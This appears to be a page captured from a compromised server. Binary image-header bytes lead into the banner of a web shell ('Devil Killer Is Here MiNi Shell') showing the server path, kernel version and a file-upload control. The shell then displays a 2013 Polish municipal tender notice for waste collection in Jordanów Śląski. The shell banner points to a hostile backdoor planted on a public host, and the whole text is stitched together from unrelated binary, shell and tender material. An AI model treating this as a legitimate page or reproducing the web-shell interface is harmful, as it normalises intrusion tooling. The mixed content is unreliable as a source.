JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/168848-N-2013.html

<p class="kh_header"><b>Jordanów Śląski: Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych, na których powstają odpady komunalne, z terenu
Gminy Jordanów Śląski</b><br>
<b>Numer ogłoszenia: 168848 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jordanów Śląski , ul. Wrocławska 55, 55-065 Jordanów Śląski, woj. dolnośląskie, tel. 071 3911580, faks 071 3911590.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> WWW.JORDANOWSLASKI.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych, na których powstają odpady komunalne, z terenu
Gminy Jordanów Śląski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi odbioru i zagospodarowania odpadów komunalnych z terenu gminy Jordanów Śląski, powstających na nieruchomościach zamieszkałych i niezamieszkałych. Jordanów Śląski, to gmina wiejska obejmująca swym zasięgiem 14 miejscowości: Jordanów Śląski, Dankowice, Wilczkowice, Biskupice, Pożarzyce, Jezierzyce Wielkie, Mleczna, Janówek, Glinica, Piotrówek, Winna Góra, Tomice, Popowice i Karolin o łącznej powierzchni 56,6  km2 ha. Liczba mieszkańców gminy na dzień 27.03.2013 r. - 3114 osób.
W ofercie należy ująć, oprócz nieruchomości zamieszkałych, niżej wymienione obiekty: 
1) Publiczna Szkoła Podstawowa i Publiczne Gimnazjum w Jordanowie Śląskim,
2) Urząd Gminy w Jordanowie Śląskim,
3) Gminny Ośrodek Pomocy Społecznej,
4) Biologiczna Oczyszczalnia Ścieków w Jordanowie Śląskim, 
5) Firmy i Zakłady Pracy na terenie Gminy Jordanów Śląski.
Rodzaje oraz ilość odpadów komunalnych odbieranych selektywnie od właścicieli nieruchomości:
odpady zmieszane (20 03 01) oraz pozostałości z segregowania odpadów,
papier i tektura (20 01 01) oraz opakowania z papieru i tektury (15 01 01),
tworzywa sztuczne (20 01 39) oraz opakowania z tworzyw sztucznych (15 01 02),
metale (20 01 40) oraz opakowania z metali (20 01 40),
szkło (20 01 02) oraz opakowania ze szkła (15 01 07),
odpady wielomateriałowe (15 01 05),
zmieszane odpady opakowaniowe (15 01 06),
odpady kuchenne ulegające biodegradacji (20 01 08), ogrodowe (20 01 99, 20 02 01) i zielone (20 03 02);
zużyte baterie i akumulatory (20 01 33, 20 01 34),
leki cytotoksyczne i cytostatyczne (20 01 31) oraz inne leki niż 20 01 31 (20 01 32),
zużyty sprzęt elektryczny i elektroniczny (20 01 35, 20 01 36),
odpady z czyszczenia ulic i placów (20 03 03),
meble i inne odpady wielkogabarytowe (20 03 77),
żużel i popiół z pieców centralnego ogrzewania, pieców kaflowych lub innych źródeł ciepła,
opakowania po nawozach sztucznych,
opakowania po farbach i lakierach,
zużyte opony (16 01 03),
gruz budowlany z remontów.

Wytworzone i odebrane ilości odpadów komunalnych z terenu Gminy Jordanów Śląski;
Ilości odebranych odpadów w tonach
Wyszczególnienie              2009         2010    2011            2012
Odpady zmieszane           327,23       328,81             296,3            320,1
Papier i tektura              9,4          9,6                 11,99             13,8
Tworzywa              5,0          5,4       8,2               11,4
Szkło                          10,5        10,8                  16,5             26,6
Odpady wielkogabarytowe    6,8                 6,2         1,8               4,6
RTV i AGD                                   1,2               1,7

Ilość gospodarstw wraz z ilością osób w poszczególnych miejscowościach (wg wyliczenia własne Urzędu Gminy Jordanów Śląski na stan wrzesień 2012)
Lp.Miejscowość Łączna ilość   Ilość gosp. Ilość gosp. Ilość gosp  Ilość gosp.
                          gospodarstw  1-osob.     2-osob.     3-osob.     4 i więcej osob.
1.Jordanów Śląski      358           47 93 89      129
2.Janówek        48             7 8 13        20
3.Jezierzyce Wlk.        50             9 15 5        21
4.Mleczna        36             4 8 6        18
5.Wilczkowice        90            12 17 18        43
6.Glinica                     46             0 13 12        21
7.Dankowice        82            12 22 21        27
8.Pożarzyce        32             2 8 4        18
9.Winna Góra        13             0 4 4          5
10.Tomice        22             1 3 9          9
11.Janówek        44             5 8 13        18
12.Biskupice        25             4 6 5        10
13.Piotrówek        38             7 11 6        14
14.Karolin        21             8 4 1      8
SUMA:                    905            118         220        206                361


Dodatkowe informacje:
Wykonawca winien składając ofertę przyjąć wzrost ilości produkowanych odpadów w oparciu o własne doświadczenia oraz założenia wzrostu produkcji odpadów określonych w Planie gospodarki odpadami województwa dolnośląskiego.
Zbiórka odpadów bezpośrednio z nieruchomości zamieszkałych i niezamieszkałych odbywać się będzie z podziałem na odpady:
odpady komunalne zmieszane umieszczane w pojemnikach do zbierania odpadów zmieszanych, spełniających wymagania Regulaminu, 
papier i makulaturę umieszczane w pojemnikach lub workach do selektywnego zbierania papieru i makulatury w kolorze niebieskim, spełniających wymagania Regulaminu,
opakowania wielomateriałowe wraz z metalami i tworzywami sztucznymi umieszczane w pojemnikach lub workach w kolorze żółtym, spełniających wymagania Regulaminu, 
opakowania ze szkła białego umieszczane w pojemnikach lub workach do selektywnego zbierania opakowań ze szkła białego w kolorze białym, spełniających wymagania Regulaminu, 
opakowania ze szkła kolorowego umieszczane w pojemnikach lub workach do selektywnego zbierania opakowań ze szkła kolorowego w kolorze zielonym, spełniających wymagania Regulaminu, 
odpady biodegradowalne umieszczane w pojemnikach lub workach do selektywnego zbierania odpadów biodegradowalnych w kolorze brązowym, spełniających wymagania Regulaminu.
Wykonawca zobowiązany jest do zapewnienia worków na odpady w sposób ciągły i uzupełniania ich po każdorazowym odbiorze z nieruchomości odpadów, o których mowa w ust. 2 pkt. 2-6. Wykonawca po raz pierwszy wyposaży te nieruchomości w worki, o których mowa w ust. 2, w terminie do 5.07.2013 r. Worki winny byś opatrzone logo firmy wraz z danymi teleadresowymi.
Dopuszcza się umieszczanie odpadów, o których mowa w ust. 2 w workach w innym kolorze, w przypadku przejściowego braku worków w odpowiednim kolorze.
Odbiór odpadów komunalnych określonych w pkt. 2 będzie odbywał się zgodnie z harmonogramem wywozu odpadów komunalnych dla gminy Jordanów Śląski tj.: odpadów komunalnych zmieszanych, odpadów zbieranych w sposób selektywny, z uwzględnieniem częstotliwości wywozu określonej w cz.  3.4 Harmonogram odbioru odpadów komunalnych . Częstotliwość wywozu odpadów, o której mowa w cz.  3.4 Harmonogram odbioru odpadów komunalnych , jest częstotliwością minimalną i jej ewentualne zmniejszenie nie będzie możliwe w trakcie realizacji usługi wywozu.
Wykonawca jest zobowiązany do zebrania wszystkich worków z odpadami segregowanymi wystawionych przed nieruchomości zamieszkałe oraz zagospodarowania tych odpadów.
Wykonawca jest zobowiązany do osiągnięcia, zgodnie z art. 3b ust. 1 i art. 3c ust. 1 ustawy o utrzymaniu czystości i porządku w gminie i rozporządzeniami wykonawczymi do ustawy, założonych poziomów recyklingu, przygotowania do ponownego użycia, odzysku innymi metodami odpadów komunalnych następujących frakcji: papieru, metalu, tworzyw sztucznych, szkła i innych niebezpiecznych odpadów komunalnych, oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania. 
Wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku dla frakcji odpadów: papier, tworzywa sztuczne, szkło i metal wynoszą:
a) w roku 2013 - co najmniej 12%,
b) w roku 2014 - co najmniej 14%,
c) w roku 2015 - co najmniej 16%.
Wymagane poziomy ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania w stosunku do tych odpadów wytworzonych w 1995r.
a) do 16 lipca roku 2013 - co najmniej 50%,
b) w roku 2014 - co najmniej 50%,
c) w roku 2015 - co najmniej 50%.
Wykonawca jest zobowiązany do osiągnięcia, założonych poziomów recyklingu, przygotowania do ponownego użycia, odzysku innymi metodami innymi niż niebezpieczne odpadów budowlanych i rozbiórkowych. 
Wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku dla ww. frakcji odpadów wynoszą:
a) w roku 2013 - co najmniej 36%,
b) w roku 2014 - co najmniej 38%,
c) w roku 2015 - co najmniej 40%.
Osiągnięcie ww. poziomów recyklingu przygotowania do ponownego użycia i odzysku dla ww. frakcji wymagane jest w każdym półroczu danego roku.
Na Wykonawcy spoczywa obowiązek prowadzenia działań informacyjnych i edukacyjnych w zakresie prawidłowego gospodarowania odpadami komunalnymi, w szczególności w zakresie selektywnego zbierania odpadów komunalnych. Obowiązek ten będzie realizowany w szczególności poprzez:
a) przeprowadzenie akcji informacyjnej dotyczącej organizacji nowego systemu zbiórki odpadów poprzez przygotowanie informacji do zamieszczenia w prasie lokalnej/regionalnej, na stronie internetowej zamawiającego i wykonawcy oraz dostarczenia harmonogramu odbioru odpadów w terminie maksymalnie do 30 dni od daty zawarcia umowy,
b) przeprowadzenie cyklicznie (co najmniej dwukrotnie w terminie trwania umowy) akcji promocyjno- informacyjnych obejmujących zasięgiem terytorialnym całą Gminę polegających w szczególności na zamieszczeniu plakatów w miejscach użyteczności publicznej, takich jak urzędy, przychodnie lekarskie, szkoły i przedszkola itp., a także dystrybucję ulotek informacyjnych oraz harmonogramów wywozu odpadów, co najmniej czterokrotnie w okresie trwania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.40.00.00-1, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.50.00.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca wniesie wadium w wysokości 12 000,00  zł, w terminie do 20.05.2013r. do godz. 9:30.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia Wnioskodawcy zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych (wg załącznika nr 3 do SIWZ) poprzez stwierdzenie SPEŁNIA  / NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał usługi polegające na odbieraniu i zagospodarowywaniu odpadów komunalnych w łącznej ilości nie mniejszej niż 2 000 Mg odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, wraz z dokumentami potwierdzającymi, że usługa ta została wykonana lub jest wykonywana należycie; wzór wykazu stanowi załącznik nr 5 do SIWZ. 
Ocena spełnienia tego warunku nastąpi na podstawie wykazu wykonanych robót (wg załącznika nr 4 do SIWZ) i załączonych dokumentów, poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym zdolnym do wykonania zamówienia na podstawie Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (DZ.U. 2013r., poz. 122). 
 Ocena spełniania tego warunku nastąpi na podstawie złożonego oświadczenia Wykonawcy zgodnie z art. 22 ust.1 Prawo zamówień publicznych (wg załącznika nr 3 do SIWZ) poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia na podstawie Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (DZ.U. 2013r., poz. 122). 
 Ocena spełniania tego warunku nastąpi na podstawie złożonego oświadczenia Wykonawcy zgodnie z art. 22 ust.1 Prawo zamówień publicznych (wg załącznika nr 3 do SIWZ) poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeśli Wykonawcy wykażą, że posiadają na realizację przedmiotowego zamówienia środki finansowe lub zdolność kredytową w wysokości 500 000,00 zł (słownie pięćset pięćdziesiąt tysięcy złotych) oraz posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (od szkód na rzecz osób i mienia) o wartości nie mniejszej niż 600 000,00 zł (słownie: siedemset tysięcy złotych). Ocena spełnienia tego warunku nastąpi  na podstawie dostarczonych dokumentów tj. informacji z banku lub spółdzielczej kasy oszczędnościowo kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy oraz wystawioną nie wcześniej niż 3 miesiące przed terminem składania ofert  oraz opłaconą polisę  lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (od szkód na rzecz osób i mienia) poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia wadium.
2. Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów wg załącznika nr 7 do SIWZ (o ile dotyczy).
3. Wypełniony formularz ofertowy według wzoru stanowiącego załącznik nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień umowy w następujących przypadkach i po spełnieniu warunków:
a)Zamawiający dopuszcza zmianę istotnych postanowień umowy zgodnie z wymogami artykułu 144 ustawy PZP w przypadku wystąpienia następujących okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy.
b)zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
c)wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
d)niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy /w szczególności umowy, wypadku losowego, nieprzewidzianej zmiany organizacyjnej/.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
